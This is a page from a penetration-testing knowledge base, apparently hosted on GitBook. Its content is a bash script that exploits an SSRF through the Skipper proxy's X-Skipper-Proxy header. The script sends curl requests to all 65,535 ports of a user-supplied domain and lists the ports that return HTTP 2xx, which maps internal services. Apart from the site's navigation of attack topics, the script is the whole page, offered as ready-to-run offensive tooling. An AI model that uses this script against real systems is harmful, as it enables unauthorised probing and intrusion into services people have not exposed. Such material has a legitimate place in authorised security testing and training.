πŸ’»
AcuityLabs
LinkedIn
  • πŸ’»$ pwnlab.sh --gui
  • βš”οΈAttacking
    • πŸͺŸWindows & Active Directory
      • Active Directory Enumeration
      • Data Transfer
      • Execution
      • Privilege Escalation
    • 🐧Linux
      • Reconnaissance
      • Privilege Escalation
      • Lateral Movement
      • Data Transfer
      • Command and Control
    • πŸ•ΈοΈWebservices
      • Fuzzing
      • SSRF
    • πŸ› οΈOSINT
    • πŸ”Host Discovery
    • Footprinting
    • Services
      • Databases
      • SMB
      • NFS
      • SNMP
      • SMTP
    • πŸͺœPivoting & Portforwarding
  • πŸ›‘οΈDEFENDING
    • SSH
  • CTF
    • Writeups
      • HackTheBox
      • TryHackMe
  • πŸ’£Payloads
    • PayloadsAllTheThings
    • Revshells
  • πŸ“˜Ressources
    • Mindmap
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • SPLOITIFY
    • MALAPI
  • Knowledge Bases
    • Pentest Everything
    • Hacker Recipes
    • Pentest Book
    • HackTricks
    • HackTricks Cloud
  • πŸ”‘Wordlists
    • Weakpass
    • Assetnote
    • Seclists
Powered by GitBook
On this page
  1. Attacking
  2. Webservices

SSRF

SSRF Port Enumerator via Skipper Proxy SSRF

#!/bin/bash

# Greeting message
echo "Welcome to the SSRF Port Enumeration Script"

# Prompt the user for the domain
read -p "Enter the domain to test: " domain

# Prompt the user for the protocol, defaulting to HTTP
read -p "Enter the protocol to use (http/https) [http]: " protocol
protocol=${protocol:-http}

# Total number of ports to scan
total_ports=65535

# Run curl in parallel for ports 1 to 65535 using xargs with a progress bar
seq 1 $total_ports | pv -l -s $total_ports | xargs -P 10 -I {} sh -c '
    url='"$protocol"'://'"$domain"':{}
    response=$(curl -s -o /dev/null -w "%{http_code}" $url -H "X-Skipper-Proxy: $url")
    first_char=$(echo $response | cut -c1)
    if [ "$first_char" -eq "2" ]; then
        echo "Successful response on port {}: HTTP $response - URL: $url"
    fi
'
PreviousFuzzingNextOSINT

Last updated 10 months ago

βš”οΈ
πŸ•ΈοΈ